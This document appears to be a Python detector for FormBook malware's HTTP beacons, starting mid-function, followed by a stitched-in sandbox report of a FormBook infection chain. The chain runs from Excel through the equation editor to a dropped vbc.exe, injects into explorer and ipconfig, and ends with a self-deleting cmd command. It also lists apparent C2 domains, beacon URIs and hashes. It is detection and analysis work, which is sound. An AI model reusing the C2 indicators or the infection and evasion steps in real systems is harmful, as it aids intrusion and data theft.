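        reasons.append("HTTP from a system process (code injection indicator)")
    if req.method == "GET" and len(segments) == 1 and path.endswith("/") and 3 <= len(segments[0]) <= 8:
        reasons.append("single short directory as the whole path")
    if (len(pairs) == 2 and all(1 <= len(k) <= 4 for k, _ in pairs)
            and B64_BLOB.match(pairs[0][1]) and SHORT_ID.match(pairs[1][1])):
        reasons.append("two short query keys: base64 blob + short id")
    if hdrs.get("connection", "").lower() == "close" and "user-agent" not in hdrs:
        reasons.append("no User-Agent and Connection: close")
    if req.method == "GET" and req.body and set(req.body) == {0}:
        reasons.append(f"GET carrying {len(req.body)} null bytes of body")
    return reasons


def is_beacon(req: HttpRequest, min_hits: int = 3) -> bool:
    return len(beacon_reasons(req)) >= min_hits


def rotation_clusters(reqs: list) -> dict:
    """Group beacon-like requests by (path, query keys, trailing id) and keep
    groups that reach more than one host. FormBook walks a list of decoy and
    real C2 domains with the same path and id, so the rotation itself is the
    strongest signal, regardless of whether each server answered 401/301/404."""
    groups = defaultdict(set)
    for r in reqs:
        pairs = query_pairs(r.uri)
        if not pairs or not is_beacon(r):
            continue
        key = (urlsplit(r.uri).path, tuple(k for k, _ in pairs), pairs[-1][1])
        groups[key].add(r.host)
    return {k: hosts for k, hosts in groups.items() if len(hosts) > 1}


def sample_requests() -> list:
    """Constructed records: the three explorer.exe sessions from the report
    plus one benign browser request for contrast."""
    c2 = dict(process=r"C:\Windows\explorer.exe", method="GET", body=b"\x00" * 7)
    return [
        HttpRequest(host="www.fashionwatchesstore.com", status=401,
                    uri="/nsag/?SFN=S6to9wknRE4YQNZFkHgt/L/SBo+9VyFJxmA+r1dPkJtX1rvSVI6t0SymKIjP48fhKDCKWg==&cBb=LtD0g",
                    headers={"Host": "www.fashionwatchesstore.com", "Connection": "close"}, **c2),
        HttpRequest(host="www.athara-kiano.com", status=301,
                    uri="/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g",
                    headers={"Host": "www.athara-kiano.com", "Connection": "close"}, **c2),
        HttpRequest(host="www.overseaexpert.com", status=404,
                    uri="/nsag/?SFN=toXeTgYrlJ3t8R2kv84tVNAusZG5KBfjoz4tCiNIzgm9lAElLlwfiIUD/nI/OmI1vpPL+Q==&cBb=LtD0g",
                    headers={"Host": "www.overseaexpert.com", "Connection": "close"}, **c2),
        HttpRequest(process=r"C:\Program Files\Mozilla Firefox\firefox.exe", host="www.example.com",
                    method="GET", uri="/index.html", body=b"", status=200,
                    headers={"Host": "www.example.com", "User-Agent": "Mozilla/5.0", "Connection": "keep-alive"}),
    ]


if __name__ == "__main__":
    reqs = sample_requests()
    for r in reqs:
        print(r.host, r.status, "->", beacon_reasons(r))
    for key, hosts in rotation_clusters(reqs).items():
        print("rotation over", len(hosts), "hosts with path", key[0], "id", key[2])
```

The server replies are deliberately left out of the score: FormBook cycles through a list of mostly decoy domains and only one is live, so the 404 from www.overseaexpert.com does not make that beacon benign. Over proxy or Zeek HTTP logs the same functions apply unchanged, except that the process name has to come from an endpoint sensor rather than the packet capture.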


                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:25:50
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                        Imagebase:0x13f880000
                                                                                                                                                                                                        File size:27641504 bytes
                                                                                                                                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:11
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:543304 bytes
                                                                                                                                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:14
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:217624 bytes
                                                                                                                                                                                                        MD5 hash:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        • Detection: 36%, ReversingLabs
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:15
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                        Imagebase:0x400000
File size: 217624 bytes
MD5 hash: 2915C0AFB0B6B26A5A699965D2119F7A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 10:26:18
Start date: 23/02/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0xffca0000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:26:33
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\ipconfig.exe
Imagebase: 0x1a0000
File size: 27136 bytes
MD5 hash: CABB20E171770FF64614A54C1F31C033
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 10:26:37
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\Public\vbc.exe'
Imagebase: 0x49d30000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
